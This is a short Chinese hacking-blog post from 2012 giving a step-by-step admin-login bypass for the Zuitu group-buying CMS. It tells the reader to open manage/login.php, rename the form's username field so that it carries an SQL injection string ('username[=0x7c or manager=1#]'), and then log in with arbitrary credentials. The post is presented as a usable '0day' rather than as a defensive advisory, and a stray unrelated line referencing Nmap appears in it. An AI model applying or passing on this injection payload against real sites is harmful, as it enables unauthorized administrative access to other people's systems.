当前位置: iick's blog > 网站漏洞 > 最土团购网 BYPASS登录后台0day

最土团购网 BYPASS登录后台0day

作者:hack1990 时间:12-04-17 阅读数:617人阅读
1:后台地址manage/login.php
 
2.右键查看源代码。找到以下代码:
 
<div><labelfor="manage-login">登录名</label><inputtype="text"size="30"name="username"id="manage-username"datatype="require"require="true"/></div>
3.将其中的name="username" 修改为:name="username[=0x7c or manager=1#]",点击浏览器上的应用保存(op浏览器下)。 
4.直接在账号s,密码s进行登陆后台。 
# Nmap Security Scanner 7.0

上一篇:PHPWIND得到管理员密码的方法

下一篇:MTK手机短信漏洞大曝光0day

相关文章

发表评论